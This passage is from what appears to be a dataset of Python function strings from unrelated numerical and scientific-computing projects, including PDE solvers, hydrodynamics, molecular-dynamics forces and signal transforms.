- r[0]\n # Set Nx equal to Nr for now.\n # The implementation is more complicated if they differ, and need to interpolate between values.\n Nx = Nr\n\n # Nonuniform grid spacing along x!\n # Nx = length(dx) has to hold.\n dx = np.empty(len(FMean) - 1)\n for ii in range(1, len(FMean)):\n dx[ii - 1] = FMean[ii] - FMean[ii - 1]\n\n [A, B, C, tau] = loadAcoustics(varList['xf'], varList['Tf'], varList['acModes'], varList['beta'])\n\n Matrix = buildMatrix(Nr, dR, varList['beta'], den, r, FMean, dFMeanDr, d2FMeanDr2, varList['Mark'], varList['acModes'], A,\n B, C, Nx, dx, tau, qMean, varList['convSpeed'])\n\n [d, W, V] = eigProblem.solveEigProb(Matrix)\n [dnew, Wnew, Vnew] = eigProblem.selectUnstable(d, W, V)\n\n print dnew / (2. 
* np.pi)", "def method2(automaton, level):\r\n\r\n old_bad_twin = automaton\r\n i = 1\r\n while i <= level:\r\n new_bad_twin = generate_bad_twin(old_bad_twin, i)\r\n c2 = condition_C2(new_bad_twin)\r\n c3 = condition_C3(new_bad_twin)\r\n if not(c2 or c3):\r\n good_twin = generate_good_twin(new_bad_twin)\r\n synchronized, ambiguous_transitions = synchronize_1(new_bad_twin, good_twin)\r\n c1 = condition_C1(ambiguous_transitions)\r\n if not c1:\r\n for src_name, dst_name in ambiguous_transitions:\r\n states = synchronized.get_states()\r\n if find_loops(states[dst_name], {src_name}):\r\n return i - 1\r\n old_bad_twin = new_bad_twin\r\n i += 1\r\n return True", "def boundary(self):\n answer = self.zero()\n for k, v in self.items():\n for idx, cube in enumerate(k):\n acc_dim = sum((cube_l.dimension for cube_l in k[:idx]))\n for i in range(cube.dimension):\n for epsilon in (0, 1):\n new_cube = cube.face(i, epsilon)\n new_k = k[:idx] + (new_cube,) + k[idx + 1:]\n sign_exp = (acc_dim + i + epsilon) % 2\n answer += answer.create({new_k: v * (-1)**sign_exp})\n return answer", "def equiangulate(self,x,mask):\n\n timeout = 100\n k = 0\n while (not mask.all())and(k<timeout):\n\n changed_tris,j = np.nonzero(~mask)\n chosen_cell = changed_tris[0]\n cell_mask = np.zeros(3,dtype=np.bool)\n cell_mask[j[0]] = True\n chosen_opposite_cell = self.v_neighbours[chosen_cell,cell_mask][0]\n\n\n cells = np.roll(self.tris[chosen_cell],-j[0])\n opposite_cells = self.tris[chosen_opposite_cell]\n opposite_cells = np.roll(opposite_cells, - self.k2s[chosen_cell,cell_mask])\n\n\n self.tris[chosen_cell] = cells[0], opposite_cells[0],cells[2]\n self.tris[chosen_opposite_cell] = opposite_cells[0],cells[0], opposite_cells[2]\n\n self.Angles[[chosen_cell,chosen_opposite_cell]] = tri_angles_periodic(x, self.tris[[chosen_cell,chosen_opposite_cell]], self.L)\n # self.Angles = tri_angles_periodic(x,self.tris,self.L)\n self.Cents = x[self.tris]\n self.vs = self.get_vertex_periodic()\n\n\n modify_neighbours = np.concatenate([self.v_neighbours[chosen_cell],self.v_neighbours[chosen_opposite_cell]])\n modify_neighbours.sort()\n self.v_neighbours[modify_neighbours] = -1\n\n\n n_neigh = get_neighbours(self.tris,self.v_neighbours,Range = modify_neighbours)\n self.v_neighbours = n_neigh\n self.neighbours = self.vs[n_neigh]\n\n self.k2s = get_k2(self.tris, self.v_neighbours)\n if (self.k2s>=3).sum()!=0:\n self._triangulate_periodic(x)\n self.k2s = get_k2(self.tris, self.v_neighbours)\n mask[:] = True\n else:\n mask = ((self.Angles[self.v_neighbours, self.k2s] + self.Angles) < np.pi)\n k+=1\n if k == timeout:\n self._triangulate_periodic(x)\n self.k2s = get_k2(self.tris, self.v_neighbours)", "def fwht(X):\n n = X.shape[0]\n # number of stages\n s = (n-1).bit_length()\n\n def init1():\n Y = jnp.empty(X.shape, dtype=X.dtype)\n A = X[0::2]\n B = X[1::2]\n Y = Y.at[0::2].set(A + B)\n Y = Y.at[1::2].set(A - B)\n return (Y, 1, 2, 4)\n\n def body1(state):\n # gap between x entries\n # number of x entries\n X, count, gap, step = state\n Y = jnp.empty(X.shape, dtype=X.dtype)\n J = 0\n k = 0\n def body2(state):\n Y, J, k = state\n def body3(state):\n Y, j, k = state\n # compute the four parts\n a = X[j]\n b = X[j+gap]\n c = X[j+1]\n d = X[j+1+gap]\n Y = Y.at[k].set(a+b)\n Y = Y.at[k+1].set(a-b)\n Y = Y.at[k+2].set(c-d)\n Y = Y.at[k+3].set(c+d)\n return (Y, j+2, k+4)\n def cond3(state):\n j = state[1]\n return j < J+gap-1\n # the loop\n init3 = (Y, J, k)\n Y, j, k = lax.while_loop(cond3, body3, init3)\n return (Y, J + step, k)\n\n def cond2(state):\n k = 
state[2]\n return k < n - 1\n\n init2 = Y, J, 0\n Y, J, k = lax.while_loop(cond2, body2, init2)\n\n return (Y, count+1, 2*gap, 2*step)\n\n def cond1(state):\n count = state[1]\n return count < s\n\n state = lax.while_loop(cond1, body1, init1())\n return state[0]", "def conditional_wegstein(f, x0):\n g0, condition = f(x0)\n g1 = x1 = g0\n w = np.ones_like(x0)\n np_abs = np.abs\n while condition:\n try: g1, condition = f(x1)\n except:\n x1 = g1\n g1, condition = f(x1)\n dx = x1-x0\n dummy = dx-g1+g0\n mask = np_abs(dummy) > 1e-16\n w[mask] = dx[mask]/dummy[mask]\n x0 = x1\n g0 = g1\n x1 = w*g1 + (1.-w)*x1", "def run(self):\n i = 0\n try:\n for i in range(0, self._iters):\n if self._verbose:\n print(\" Inner CG Iteration \" + repr(i))\n\n self._forward(self._p_k, self._v_k)\n sigma_k = measure(self._p_k, self._v_k)\n alpha_k = self._rho_k / sigma_k\n update_m(self._m, alpha_k, self._p_k)\n sub_scaled_vector(self._residual_k, self._residual_k, alpha_k,\n self._v_k)\n self._v_k = gpuarray_copy(self._residual_k)\n rho_k_plus_1 = measure(self._v_k, self._residual_k)\n rho_k_t = np.abs(rho_k_plus_1)\n\n if (rho_k_t / self._rho_0 <= self._relative_tolerance) \\\n or (rho_k_t <= self._absolute_tolerance):\n if self._verbose:\n print(\"Converged at Iteration \" + str(i) + \".\")\n self.converged = True\n self.iteration = i+1\n return\n\n add_scaled_vector(self._p_k, self._v_k,\n rho_k_plus_1/self._rho_k,\n self._p_k)\n self._rho_k = rho_k_plus_1\n\n if self._verbose >= 3:\n print(\" Residual=\" + repr(rho_k_t))\n except KeyboardInterrupt:\n raise\n finally:\n self.iteration = i+1", "def test_v_bounds(self):\n n = 50\n t_max = 100.0\n dt = 0.1\n\n G = StudentLayer(n)\n G.i_ext_init = np.linspace(-1.0, 1.0, n)\n\n class BoundsChecker(object):\n def __init__(self, target):\n self.target = target\n self.small = None\n self.large = None\n self.order = 1\n\n def evolve(self, t, dt):\n small = np.min(self.target.v)\n large = np.max(self.target.v)\n if self.small is None or self.small > small:\n self.small = small\n if self.large is None or self.large < large:\n self.large = large\n \n M = BoundsChecker(G)\n\n sim = simulation.Simulation(G, M, dt=dt)\n sim.run(t_max)\n\n self.assertLess(M.large, G.v_th)", "def InitialCondition():\n maxX = getX(C.N + 1,C.N+1,C.alpha_max)\n y0 = np.zeros(maxX,dtype=complex)\n for i in range(0, C.N+2):\n for j in range(0, C.N+2):\n for alpha in [1]:\n\n X = getX(i, j, alpha)\n\n y0[X] = 1./2./C.N * (1-delta(i, C.N+1))*(1-delta(j, C.N+1))+1./2*delta(i, C.N+1)*delta(j, C.N+1) +\\\n 1./2./(C.N)**0.5 * ((1-delta(i, C.N+1)) *\n delta(j, C.N+1)+(1-delta(j, C.N+1))*delta(i, C.N+1))", "def MLE_procedure(func, bounds):\n return differential_evolution(func, bounds)", "def solve_euler(Npts, IC, tout, Ca = 0.7, lagrangian=False, HLLC=True):\n # Setup up the grid\n stencil = 2\n \n xe = np.linspace(0.0, 1.0, Npts+1)\n xc = 0.5*(xe[1:] + xe[:-1])\n\n def boundary(xc, Q):\n # Add periodic boundaries to Q\n Qb = np.empty([Npts+2*stencil, NHYDRO])\n Qb[stencil:-stencil] = Q\n Qb[ :stencil] = Qb[Npts:Npts+stencil]\n Qb[-stencil:] = Qb[stencil:2*stencil]\n\n # Add periodic boundaries for cell centres and compute interfaces\n xc_b = np.empty(Npts+2*(stencil+1))\n xc_b[(stencil+1):-(stencil+1)] = xc\n xc_b[ :(stencil+1)] = xc[-(stencil+1):] - 1\n xc_b[-(stencil+1):] = xc[ :(stencil+1)] + 1\n\n xe = 0.5*(xc_b[1:] + xc_b[:-1])\n xc_b = xc_b[1:-1]\n\n return xc_b, xe, Qb\n\n def RK2_prim(xc_in, Q, dt):\n #1. Apply Boundaries\n xc, xe, Qb = boundary(xc_in, Q)\n dx = np.diff(xe).reshape(-1, 1)\n\n #2. 
Compute Primitive variables\n Ub = Qb / dx\n Wb = cons2prim(Ub)\n\n #3. Compute gradients\n grad = compute_gradients(xc, xe, Wb)\n\n #4. Set interface velocities:\n if lagrangian:\n vc = Wb[:,1].copy()\n else:\n vc = np.zeros_like(Wb[:,1])\n f = (xe[1:-1] - xc[:-1]) / (xc[1:]-xc[:-1])\n vf = f*vc[1:] + (1-f)*vc[:-1]\n\n #5. Compute edge states:\n Wp = Wb[1:-1] + grad*(xe[2:-1] - xc[1:-1]).reshape(-1,1)\n Wm = Wb[1:-1] + grad*(xe[1:-2] - xc[1:-1]).reshape(-1,1)\n\n #6. Compute first fluxes:\n if HLLC:\n flux_0 = HLLC_solver(Wp[:-1], Wm[1:], vf[1:-1])\n else:\n flux_0 = HLL_solver(Wp[:-1], Wm[1:], vf[1:-1])\n\n #7. Move the mesh and compute new face locations:\n xc = xc_in + vc[stencil:-stencil]*dt\n xc, xe, _ = boundary(xc, Q)\n dx = np.diff(xe).reshape(-1, 1)\n\n #8. Predict edge states at t+dt\n # 8a. First predict the mid-points at t+dt\n dWdt = compute_time_diff_W(Wb[1:-1], grad, vc[1:-1]) \n Ws0 = Wb[1:-1] + dt*dWdt\n Ws = Wb[1:-1] + dt*dWdt\n\n # 8b. Apply the drag forces using Exponential Euler method\n rho = Ws[:,0] + FB*Ws[:,3]\n \n v_com = (Ws[:,0]*Ws[:,1] + FB*Ws[:,3]*Ws[:,4])/rho\n dV = (Wb[1:-1,4] - Wb[1:-1,1]) * np.exp(-K*rho*dt) \n da = (dWdt[:,4] - dWdt[:,1]) *-np.expm1(-dt*K*rho)/(K*rho)\n\n Ws[:,1] = v_com - FB*Ws[:,3]*(dV + da)/rho\n Ws[:,4] = v_com + Ws[:,0]*(dV + da)/rho\n \n # Heating due to drag\n dEk = 0.5*(Ws[:,0]*Ws[:,1]**2 - Ws0[:,0]*Ws0[:,1]**2 +\n Ws[:,3]*Ws[:,4]**2 - Ws0[:,3]*Ws0[:,4]**2)\n Ws[:,2] -= dEk * (GAMMA-1)\n \n # 8c. Reconstruct the edge states\n Wp = Ws + grad*(xe[2:-1] - xc[1:-1]).reshape(-1,1)\n Wm = Ws + grad*(xe[1:-2] - xc[1:-1]).reshape(-1,1)\n\n #9. Compute second fluxes\n if HLLC:\n flux_1 = HLLC_solver(Wp[:-1], Wm[1:], vf[1:-1])\n else:\n flux_1 = HLL_solver(Wp[:-1], Wm[1:], vf[1:-1])\n\n #10. Compute the drag terms using 2nd order exponential Runge-Kutta method.\n f_g0 = -np.diff(flux_0[:,1]) ; f_g1 = -np.diff(flux_1[:,1])\n f_d0 = -np.diff(flux_0[:,4]) ; f_d1 = -np.diff(flux_1[:,4])\n\n Qn = Q - 0.5*dt*np.diff(flux_0 + flux_1, axis=0) \n\n m_com = Qn[:,1] + FB*Qn[:,4]\n \n rho = Qn[:,0] + FB*Qn[:,3]\n eps_g = Qn[:,0] / rho ; eps_d = Qn[:,3] / rho\n rho /= np.diff(xe[stencil:-stencil])\n\n df = (eps_g*(f_d0+f_d1) - eps_d*(f_g0+f_g1)) / 2\n\n dm = (eps_g*Q[:,4] - eps_d*Q[:,1]) * np.exp(-K*rho*dt) \n dm += df *-np.expm1(-dt*K*rho)/(K*rho)\n \n m_d = eps_d * m_com + dm\n m_g = eps_g * m_com - dm*FB\n\n #11. 
Update Conserved quantities\n Q[:] = Qn\n\n Q[:,1] = m_g\n Q[:,4] = m_d\n\n # Heating due to drag to conserve energy\n if FB:\n Q[:,2] -= 0.5*(Q[:,4]**2 - Qn[:,4]**2) / Q[:,3]\n \n\n # Return\n xc = xc[stencil:-stencil]\n xe = xe[stencil:-stencil]\n\n return xc, xe, Q\n\n # Set the initial conditions\n dx = np.diff(xe).reshape(-1,1)\n W = IC(xe)\n U = prim2cons(W)\n Q = U * dx\n\n t = 0\n while t < tout:\n\n U = Q/dx\n\n vf = 0\n if lagrangian:\n vf = U[:,1] / U[:,0]\n dtmax = Ca * np.min(dx / max_wave_speed(U, vf))\n dt = min(dtmax, tout-t)\n\n xc, xe, Q = RK2_prim(xc, Q, dt)\n dx = np.diff(xe).reshape(-1,1)\n \n t = min(tout, t+dt)\n \n\n return xc, xe, cons2prim(Q/dx)", "def boundary_conditions(x, t, z=None, nbsym=2):\n indmax = argrelmax(x)[0]\n indmin = argrelmin(x)[0]\n lx = x.shape[0] - 1\n if indmin.shape[0] + indmax.shape[0] < 3:\n raise ValueError(\"Not enough extrema.\")\n\n if indmax[0] < indmin[0]:\n if x[0] > x[indmin[0]]:\n lmax = indmax[1:np.min([indmax.shape[0], nbsym + 1])][::-1]\n lmin = indmin[:np.min([indmin.shape[0], nbsym])][::-1]\n lsym = indmax[0]\n else:\n lmax = indmax[1:np.min([indmax.shape[0], nbsym])][::-1]\n lmin = indmin[:np.min([indmin.shape[0], nbsym - 1])][::-1]\n lmin = np.hstack((lmin, [1]))\n lsym = 1\n else:\n if x[0] < x[indmax[0]]:\n lmax = indmax[:np.min([indmax.shape[0], nbsym])][::-1]\n lmin = indmin[1:np.min([indmin.shape[0], nbsym + 1])][::-1]\n lsym = indmin[0]\n else:\n lmax = indmax[:np.min([indmin.shape[0], nbsym - 1])][::-1]\n lmax = np.hstack((lmax, [1]))\n lmin = indmin[:np.min([indmax.shape[0], nbsym])][::-1]\n lsym = 1\n\n if indmax[-1] < indmin[-1]:\n if x[-1] < x[indmax[-1]]:\n rmax = indmax[(max([indmax.shape[0] - nbsym + 1, 1]) - 1):][::-1]\n rmin = indmin[(max([indmin.shape[0] - nbsym, 1]) - 1):-1][::-1]\n rsym = indmin[-1]\n else:\n rmax = indmax[max(indmax.shape[0] - nbsym + 1, 0):indmax.shape[0]][::-1]\n rmax = np.hstack(([lx], rmax))\n rmin = indmin[max(indmin.shape[0] - nbsym, 0):][::-1]\n rsym = lx\n else:\n if x[-1] > x[indmin[-1]]:\n rmax = indmax[max(indmax.shape[0] - nbsym - 1, 0):-1][::-1]\n rmin = indmin[max(indmin.shape[0] - nbsym, 0):][::-1]\n rsym = indmax[-1]\n else:\n rmax = indmax[max(indmax.shape[0] - nbsym, 0):][::-1]\n rmin = indmin[max(indmin.shape[0] - nbsym + 1, 0):][::-1]\n rmin = np.hstack(([lx], rmin))\n rsym = lx\n\n tlmin = 2 * t[lsym] - t[lmin]\n tlmax = 2 * t[lsym] - t[lmax]\n trmin = 2 * t[rsym] - t[rmin]\n trmax = 2 * t[rsym] - t[rmax]\n\n # In case symmetrized parts do not extend enough\n if (tlmin[0] > t[0]) or (tlmax[0] > t[1]):\n if lsym == indmax[0]:\n lmax = indmax[:np.min((indmax.shape[0], nbsym))][::-1]\n else:\n lmin = indmin[:np.min((indmin.shape[0], nbsym))][::-1]\n if lsym == 1:\n raise Exception(\"Bug\")\n lsym = 1\n tlmin = 2 * t[lsym] - t[lmin]\n tlmax = 2 * t[lsym] - t[lmax]\n\n if (trmin[-1] < t[lx]) or (trmax[-1] < t[lx]):\n if rsym == indmax.shape[0]:\n rmax = indmax[np.max([indmax.shape[0] - nbsym + 1,\n 1]):indmax.shape[0]][::-1]\n else:\n rmin = indmin[np.max([indmax.shape[0] - nbsym + 1,\n 1]):indmin.shape[0]][::-1]\n\n if rsym == lx:\n raise Exception(\"bug\")\n rsym = lx\n trmin = 2 * t[rsym] - t[rmin]\n trmax = 2 * t[rsym] - t[rmax]\n\n if z is None:\n z = x\n zlmax = z[lmax]\n zlmin = z[lmin]\n zrmax = z[rmax]\n zrmin = z[rmin]\n\n tmin = map(np.array, [tlmin, t[indmin], trmin])\n tmax = map(np.array, [tlmax, t[indmax], trmax])\n zmin = map(np.array, [zlmin, z[indmin], zrmin])\n zmax = map(np.array, [zlmax, z[indmax], zrmax])\n\n tmin, tmax, zmin, zmax = map(np.hstack, 
[tmin, tmax, zmin, zmax])\n return tmin, tmax, zmin, zmax", "def _solve_explicit(self, initial_conditions):\n coeff = self.a ** 2 * self.tau / self.h ** 2\n current_solution = initial_conditions\n next_solution = np.empty_like(current_solution)\n solutions = []\n\n for t in self.t_grid:\n next_solution[1:-1] = (\n current_solution[1:-1]\n + (current_solution[:-2] - 2 * current_solution[1:-1] + current_solution[2:]) * coeff\n ) + self.rhs(self.x_grid[1:-1], t) * self.tau\n\n # left bc\n if self.left_bc_type == \"DIRICHLET\":\n next_solution[0] = self.left_bc(t)\n elif self.left_bc_type == \"NEUMANN\":\n next_solution[0] = (\n 4 * next_solution[1]\n - next_solution[2]\n - 2 * self.h * self.left_bc(t)\n ) / 3.0\n\n # right bc\n if self.right_bc_type == \"DIRICHLET\":\n next_solution[-1] = self.right_bc(t)\n elif self.right_bc_type == \"NEUMANN\":\n next_solution[-1] = (\n 4 * next_solution[-2]\n - next_solution[-3]\n + 2 * self.h * self.right_bc(t)\n ) / 3.0\n if self.mode == \"VISUALIZATION\":\n solutions.append((t, next_solution.copy()))\n current_solution = next_solution\n if self.mode == \"TEST\":\n # print(\"Result: \", current_solution.tolist())\n # print(\"Right answer: \", self.anl_solution.tolist())\n self._norma(current_solution)\n elif self.mode == \"VISUALIZATION\":\n return solutions", "def _apply_boundary_condition(da, dim, left, boundary=None, fill_value=0.0):\n\n if boundary not in [\"fill\", \"extend\", \"extrapolate\"]:\n raise ValueError(\n \"`boundary` must be 'fill', 'extend' or \"\n \"'extrapolate', not %r.\" % boundary\n )\n\n axis_num = da.get_axis_num(dim)\n\n # the shape for the edge array\n shape = list(da.shape)\n shape[axis_num] = 1\n\n base_array = da.data\n index = slice(0, 1) if left else slice(-1, None)\n edge_array = da.isel(**{dim: index}).data\n\n use_dask = has_dask and isinstance(base_array, dsa.Array)\n\n if boundary == \"extend\":\n boundary_array = edge_array\n elif boundary == \"fill\":\n args = shape, fill_value\n kwargs = {\"dtype\": base_array.dtype}\n if use_dask:\n full_func = dsa.full\n kwargs[\"chunks\"] = edge_array.chunks\n else:\n full_func = np.full\n boundary_array = full_func(*args, **kwargs)\n elif boundary == \"extrapolate\":\n gradient_slice = slice(0, 2) if left else slice(-2, None)\n gradient_sign = -1 if left else 1\n linear_gradient = da.isel(**{dim: gradient_slice}).diff(dim=dim).data\n boundary_array = edge_array + gradient_sign * linear_gradient\n\n return boundary_array", "def fv(X,Y,dx,dy,r2,i,append,L,N,U,dt,close_list,Nlist,vel_verlet_on,R,menu,submenu,n1,grid,G,wallcount,X2):\r\n\r\n \"\"\"JV: append is a boolean. 
If it's true, adds the energy to our list, if it isn't, it doesn't.\r\n We do that because in some cases we will call the algorithm more times than the actual step number (and\r\n we only want to sum the value T/dt times), this is needed in the velocity-Verlet algorithm, that we call the fv()\r\n function one more time than needed just to start the loop.\"\"\"\r\n\r\n# L = self.param[2]\r\n#\r\n# N = self.particles.size\r\n\r\n #For computing all the distances I use a trick with the meshgrid function,\r\n #see the documentation on how this works if you dont see it.\r\n\r\n \"\"\"JV: X is an array that contains each position, mx is an nxn array that each column is the position of one particle (so it's a matrix\r\n that has n X rows) and mxt is the same but tranposed (so it's a matrix of n X columns)\"\"\"\r\n\r\n \"\"\"\r\n UPDATE: This block of code is commented because now it's done in a loop inside solve_verlet() (due to Numba...).\r\n Looks a little bit messy but if Numba allowed me to call the np.meshgrid() function we would do this here. Sorry, but I like to keep the comment to remind me that.\r\n \"\"\"\r\n # MX, MXT = np.meshgrid(X,X,copy=False)\r\n # MY, MYT = np.meshgrid(Y,Y,copy=False)\r\n\r\n #JV: So dx is a nxn simetric array with 0 in the diagonal, and each position is the corresponding distance between the particles,\r\n # so the position [1,2] is the distance between partcle 1 and 2 (x1-x2), and so on\r\n # dx = MXT - MX\r\n # dx = dx\r\n\r\n # dy = MYT - MY\r\n # dy = dy\r\n\r\n # r2 = np.square(dx)+np.square(dy)\r\n\r\n # if(menu == \"Free!\"):\r\n # #JV: We do this to get the actual distance in the case of the \"Free!\" simulation, in which there is no elastic collision between the particles and the boundaries\r\n # dx_v2 = (np.abs(dx.copy())-1*L)\r\n # r2_v2 = dx_v2**2+dy**2\r\n # dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n # r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n # dy_v2 = (np.abs(dy.copy())-1*L)\r\n # r2_v2 = dx**2+dy_v2**2\r\n # dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n # r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n # r2_v2 = dx_v2**2+dy_v2**2\r\n # dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n # dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n # r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n\r\n dUx = 0.\r\n dUy = 0.\r\n utot = np.zeros((N))\r\n f = np.zeros((N,2))\r\n\r\n for j in range(0,N):\r\n dUx = 0.\r\n dUy = 0.\r\n u = 0.\r\n\r\n #JV: we now calculate the force with only the Nlist closest particles\r\n for k in range(0,Nlist):\r\n c = int(close_list[j][k])\r\n\r\n #In the force computation we include the LJ and the walls (JV: in the verlet case). 
I truncate the interaction at self.R units of lenght,\r\n #I also avoid distances close to 0 (which only should affect the diagonal in the matrix of distances)\r\n #All these conditions are included using the numpy.where function.\r\n #If you want to include more forces you only need to add terms to these lines.\r\n\r\n if(vel_verlet_on == True):\r\n if((r2[j,c] < 4*max(R[j],R[c])) and (r2[j,c] > 10**(-2))):\r\n dUx = dUx + dLJverlet(dx[j,c],r2[j,c],R[j],R[c])\r\n dUy = dUy + dLJverlet(dy[j,c],r2[j,c],R[j],R[c])\r\n # print(dUx,dUy,dx[j,c],r2[j,c],R[j],R[c])\r\n#JV: COMMENTED PART BECAUSE NUMBA HAS PROBLEMS WITH THIS BLOCK OF CODE THAT DOES THE CALCULATION IN THE VERLET ALGORITHM, NOW IT ONLY WORKS WITH THE VELOCITY VERLET, TO FIX\"\r\n# else:\r\n# if((r2[j,c] < 4*max(R[j],R[c])) and (r2[j,c] > 10**(-2))):\r\n# dUx = dUx + dLJverlet(dx[j,c],r2[j,c],R[j],R[c]) - dwalls([X[j],Y[j]],param)\r\n# dUy = dUy + dLJverlet(dy[j,c],r2[j,c],R[j],R[c]) - dwalls([X[j],Y[j]],param)\r\n\r\n #JV: We add the energy in the corresponding array in both cases, remember that the verlet algorithm will include the energy from the walls\r\n # and that will be visible in fluctuations on the energy\r\n if(vel_verlet_on == True):\r\n if((r2[j,c] < 2*max(R[j],R[c])) and (r2[j,c] > 10**(-2))):\r\n u = u + LJverlet(r2[j,c],R[c],R[j])\r\n# else:\r\n# u = u + walls([X[j],Y[j]])#JV: TO CHANGE; NOW ONLY WORKS WITH VEL_VERLET_ON\r\n# else:\r\n# if((r2[j,c] < 2*max(R[j],R[c])) and (r2[j,c] > 10**(-2))):\r\n# u = u + LJverlet(r2[j,c],R[c],R[j],param)\r\n#\r\n# if((X[j]**2+Y[j]**2) > (0.8*L)**2):\r\n# u = u + walls([X[j],Y[j]],param)\r\n #JV: COMMENTED FOR NOW\r\n\r\n #JV: If the argument it's True, we will append the energy to our corresponding array\r\n if(append == True):\r\n utot[j] = u\r\n\r\n f[j,:] = f[j,:]+np.array([dUx,dUy])\r\n\r\n if(append == True):\r\n U[int(i)] = np.sum(utot) #JV: Finally, we add the total energy so we have the global energy in a step of time\r\n\r\n return f", "def logic(self):\r\n raise NotImplementedError", "def calculateElementBoundaryCoefficients(self):\n pass", "def _inner_loop(dets, exposure_count, delay, deadline, per_step,\n stream_name, done_signal=None):\n if done_signal is not None:\n\n from bluesky.utils import first_key_heuristic \n signal_key = first_key_heuristic(done_signal)\n def _check_signal():\n val = yield from bps.read(done_signal)\n if val is None:\n return True\n val = val[signal_key]['value']\n return bool(val)\n else:\n _check_signal = None\n\n for j in range(exposure_count):\n start_time = time.monotonic()\n\n yield from bps.checkpoint()\n # if things get bogged down in data collection, bail early!\n if start_time > deadline:\n print(f'{start_time} > {deadline} bail!')\n break\n\n # this triggers the cameras\n yield from per_step(dets, stream_name)\n\n stop_time = time.monotonic()\n exp_actual = stop_time - start_time\n sleep_time = delay - exp_actual\n\n yield from bps.checkpoint()\n if _check_signal is not None:\n done = yield from _check_signal()\n if done:\n return\n if stop_time + sleep_time > deadline:\n yield from bps.sleep(deadline - stop_time)\n return\n else:\n yield from bps.sleep(delay - exp_actual)", "def array_part_L2_loops_pruning(loops, config):\n pruned_loops = []\n tuning = config['tuning']\n loop_stop = 0\n for c in tuning['array_part_L2']['coincident']:\n if not c:\n break\n loop_stop += 1\n ubs = tuning['array_part_L2']['tilable_loops'][loop_stop:]\n for loop in loops:\n # Examine [loop_stop:-1], only leave those that equal the upper bound\n loop_cut 
= loop[loop_stop:]\n if loop_cut != ubs:\n continue\n pruned_loops.append(loop)\n\n return pruned_loops", "def solver_bc(\n kappa, f, # Coefficients in the PDE\n boundary_conditions, # Dict of boundary conditions\n Nx, Ny, # Cell division of the domain\n degree=1, # Polynomial degree\n subdomains=[], # List of SubDomain objects in domain\n linear_solver='Krylov', # Alt: 'direct'\n abs_tol=1E-5, # Absolute tolerance in Krylov solver\n rel_tol=1E-3, # Relative tolerance in Krylov solver\n max_iter=1000, # Max no of iterations in Krylov solver\n log_level=PROGRESS, # Amount of solver output\n dump_parameters=False, # Write out parameter database?\n debug=False,\n ):\n # Create mesh and define function space\n mesh = UnitSquareMesh(Nx, Ny)\n V = FunctionSpace(mesh, 'P', degree)\n\n tol = 1E-14\n\n # Subdomains in the domain?\n import numpy as np\n if subdomains:\n # subdomains is list of SubDomain objects,\n # p is array of corresponding constant values of p\n # in each subdomain\n if not isinstance(kappa, (list, tuple, np.ndarray)):\n raise TypeError(\n 'kappa must be array if we have sudomains, not %s'\n % type(kappa))\n materials = CellFunction('size_t', mesh)\n materials.set_all(0) # \"the rest\"\n for m, subdomain in enumerate(subdomains[1:], 1):\n subdomain.mark(materials, m)\n\n kappa_values = kappa\n V0 = FunctionSpace(mesh, 'DG', 0)\n kappa = Function(V0)\n help = np.asarray(materials.array(), dtype=np.int32)\n kappa.vector()[:] = np.choose(help, kappa_values)\n else:\n if not isinstance(kappa, (Expression, Constant)):\n raise TypeError(\n 'kappa is type %s, must be Expression or Constant'\n % type(kappa))\n\n # Boundary subdomains\n class BoundaryX0(SubDomain):\n def inside(self, x, on_boundary):\n return on_boundary and abs(x[0]) < tol\n\n class BoundaryX1(SubDomain):\n def inside(self, x, on_boundary):\n return on_boundary and abs(x[0] - 1) < tol\n\n class BoundaryY0(SubDomain):\n def inside(self, x, on_boundary):\n return on_boundary and abs(x[1]) < tol\n\n class BoundaryY1(SubDomain):\n def inside(self, x, on_boundary):\n return on_boundary and abs(x[1] - 1) < tol\n\n # Mark boundaries\n boundary_markers = FacetFunction('size_t', mesh)\n boundary_markers.set_all(9999)\n bx0 = BoundaryX0()\n bx1 = BoundaryX1()\n by0 = BoundaryY0()\n by1 = BoundaryY1()\n bx0.mark(boundary_markers, 0)\n bx1.mark(boundary_markers, 1)\n by0.mark(boundary_markers, 2)\n by1.mark(boundary_markers, 3)\n\n # Redefine boundary integration measure\n ds = Measure('ds', domain=mesh, subdomain_data=boundary_markers)\n\n # Collect Dirichlet conditions\n bcs = []\n for i in boundary_conditions:\n if 'Dirichlet' in boundary_conditions[i]:\n bc = DirichletBC(V, boundary_conditions[i]['Dirichlet'],\n boundary_markers, i)\n bcs.append(bc)\n\n if debug:\n # Print all vertices that belong to the boundary parts\n for x in mesh.coordinates():\n if bx0.inside(x, True): print('%s is on x = 0' % x)\n if bx1.inside(x, True): print('%s is on x = 1' % x)\n if by0.inside(x, True): print('%s is on y = 0' % x)\n if by1.inside(x, True): print('%s is on y = 1' % x)\n\n # Print the Dirichlet conditions\n print('Number of Dirichlet conditions:', len(bcs))\n if V.ufl_element().degree() == 1: # P1 elements\n d2v = dof_to_vertex_map(V)\n coor = mesh.coordinates()\n for i, bc in enumerate(bcs):\n print('Dirichlet condition %d' % i)\n boundary_values = bc.get_boundary_values()\n for dof in boundary_values:\n print(' dof %2d: u=%g' % (dof, boundary_values[dof]))\n if V.ufl_element().degree() == 1:\n print(' at point %s' %\n 
(str(tuple(coor[d2v[dof]].tolist()))))\n\n # Define trial and test functions\n u = TrialFunction(V)\n v = TestFunction(V)\n\n # Collect Neumann integrals\n integrals_N = []\n for i in boundary_conditions:\n if 'Neumann' in boundary_conditions[i]:\n if boundary_conditions[i]['Neumann'] != 0:\n g = boundary_conditions[i]['Neumann']\n integrals_N.append(g*v*ds(i))\n\n # Collect Robin integrals\n integrals_R_a = []\n integrals_R_L = []\n for i in boundary_conditions:\n if 'Robin' in boundary_conditions[i]:\n r, s = boundary_conditions[i]['Robin']\n integrals_R_a.append(r*u*v*ds(i))\n integrals_R_L.append(r*s*v*ds(i))\n\n # Simpler Robin integrals\n integrals_R = []\n for i in boundary_conditions:\n if 'Robin' in boundary_conditions[i]:\n r, s = boundary_conditions[i]['Robin']\n integrals_R.append(r*(u - s)*v*ds(n))\n\n # Define variational problem, solver_bc\n a = kappa*dot(grad(u), grad(v))*dx + sum(integrals_R_a)\n L = f*v*dx - sum(integrals_N) + 